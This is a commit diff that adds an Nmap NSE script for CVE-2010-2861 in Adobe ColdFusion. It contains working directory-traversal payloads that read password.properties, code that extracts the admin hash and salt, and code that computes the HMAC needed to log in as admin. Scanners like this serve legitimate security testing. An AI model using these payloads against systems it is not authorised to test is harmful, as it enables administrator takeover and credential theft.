summaryrefslogtreecommitdiffstats
path: root/scripts/http-vuln-cve2010-2861.nse
diff options
context:
space:
mode:
Diffstat (limited to 'scripts/http-vuln-cve2010-2861.nse')
-rw-r--r--scripts/http-vuln-cve2010-2861.nse143
1 files changed, 143 insertions, 0 deletions
diff --git a/scripts/http-vuln-cve2010-2861.nse b/scripts/http-vuln-cve2010-2861.nse
new file mode 100644
index 0000000..9b48c04
--- /dev/null
+++ b/scripts/http-vuln-cve2010-2861.nse
@@ -0,0 +1,143 @@
+local http = require "http"
+local nmap = require "nmap"
+local shortport = require "shortport"
+local stdnse = require "stdnse"
+local table = require "table"
+local vulns = require "vulns"
+
+local openssl = stdnse.silent_require "openssl"
+
+description = [[
+Executes a directory traversal attack against a ColdFusion
+server and tries to grab the password hash for the administrator user. It
+then uses the salt value (hidden in the web page) to create the SHA1
+HMAC hash that the web server needs for authentication as admin. You can
+pass this value to the ColdFusion server as the admin without cracking
+the password hash.
+]]
+
+---
+-- @see http-adobe-coldfusion-apsa1301.nse
+-- @see http-coldfusion-subzero.nse
+-- @see http-vuln-cve2009-3960.nse
+--
+-- @usage
+-- nmap --script http-vuln-cve2010-2861 <host>
+--
+-- @output
+-- 80/tcp open http
+-- | http-vuln-cve2010-2861:
+-- | VULNERABLE:
+-- | Adobe ColdFusion enter.cfm Traversal password.properties Information Disclosure
+-- | State: VULNERABLE
+-- | IDs: CVE:CVE-2010-2861 BID:42342
+-- | Description:
+-- | Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion
+-- | 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter
+-- | Disclosure date: 2010-08-10
+-- | Extra information:
+-- |
+-- | ColdFusion8
+-- | HMAC: d6914bef568f8931d0c696cd5f7748596f97db5d
+-- | Salt: 1329446896585
+-- | Hash: 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
+-- |
+-- | References:
+-- | http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking
+-- | https://www.tenable.com/plugins/nessus/48340
+-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2861
+-- | https://nvd.nist.gov/vuln/detail/CVE-2010-2861
+-- |_ https://www.securityfocus.com/bid/42342
+--
+--
+-- This script relies on the service being identified as HTTP or HTTPS. If the
+-- ColdFusion server you run this against is on a port other than 80/tcp or 443/tcp
+-- then use "nmap -sV" so that nmap discovers the port as an HTTP server.
+
+author = "Micah Hoffman"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"intrusive", "vuln"}
+
+
+portrule = shortport.http
+
+action = function(host, port)
+
+ local vuln = {
+ title = 'Adobe ColdFusion Directory Traversal Vulnerability',
+ state = vulns.STATE.NOT_VULN, -- default
+ IDS = {CVE = 'CVE-2010-2861', BID = '42342'},
+ description = [[
+Multiple directory traversal vulnerabilities in the administrator console
+in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the
+locale parameter]],
+ references = {
+ 'http://www.blackhatacademy.org/security101/Cold_Fusion_Hacking',
+ 'https://nvd.nist.gov/vuln/detail/CVE-2010-2861',
+ 'https://www.securityfocus.com/bid/42342',
+ 'https://www.tenable.com/plugins/nessus/48340',
+ },
+ dates = {
+ disclosure = {year = '2010', month = '08', day = '10'},
+ },
+ }
+ local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+
+ -- Function to do the look up and return content
+ local grabAndGrep = function(page)
+ -- Do the HTTP GET request for the page
+ local response = http.get(host, port, page)
+ -- Check to see if we get a good page returned
+ -- Is there no response?
+ if ( not(response.status) ) then
+ return false, "Received no response from HTTP server"
+ end
+
+ -- Is the response not an HTTP 200 code?
+ if ( response.status ~= 200 ) then
+ return false, ("The server returned an unexpected response (%d)"):format(response.status )
+ end
+
+ -- Now check the body for our strings
+ if ( response.body ) then
+ local saltcontent = response.body:match("salt.*value=\"(%d+)")
+ local hashcontent = response.body:match("password=(%x%x%x%x+)") --Extra %x's needed or it will match strings that are not the long hex password
+
+ -- If a page has both the salt and the password in it then the exploit has been successful
+ if ( saltcontent and hashcontent ) then
+ vuln.state = vulns.STATE.EXPLOIT
+ -- Generate HMAC as this is what the web application needs for authentication as admin
+ local hmaccontent = stdnse.tohex(openssl.hmac('sha1', saltcontent, hashcontent)):upper()
+ --return true, ("\n\tHMAC: %s\n\tSalt: %s\n\tHash: %s"):format(hmaccontent, saltcontent, hashcontent)
+ local result = {
+ ("HMAC: %s"):format(hmaccontent),
+ ("Salt: %s"):format(saltcontent),
+ ("Hash: %s"):format(hashcontent)
+ }
+ return true, result
+ end
+ end
+ return false, "Not vulnerable"
+ end
+
+ local exploits = {
+ ['CFusionMX'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX\\lib\\password.properties%00en',
+ ['CFusionMX7'] = '..\\..\\..\\..\\..\\..\\..\\..\\CFusionMX7\\lib\\password.properties%00en',
+ ['ColdFusion8'] = '..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en',
+ ['JRun4\\servers'] = '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties%00en',
+ }
+
+ local results = {}
+ for prod, exploit in pairs(exploits) do
+ local status, result = grabAndGrep('/CFIDE/administrator/enter.cfm?locale=' .. exploit)
+ if ( status or ( not(status) and nmap.verbosity() > 1 ) ) then
+ if ( "string" == type(result) ) then
+ result = { result }
+ end
+ result.name = prod
+ table.insert(results, result )
+ end
+ end
+ vuln.extra_info=stdnse.format_output(true, results)
+ return vuln_report:make_output(vuln)
+end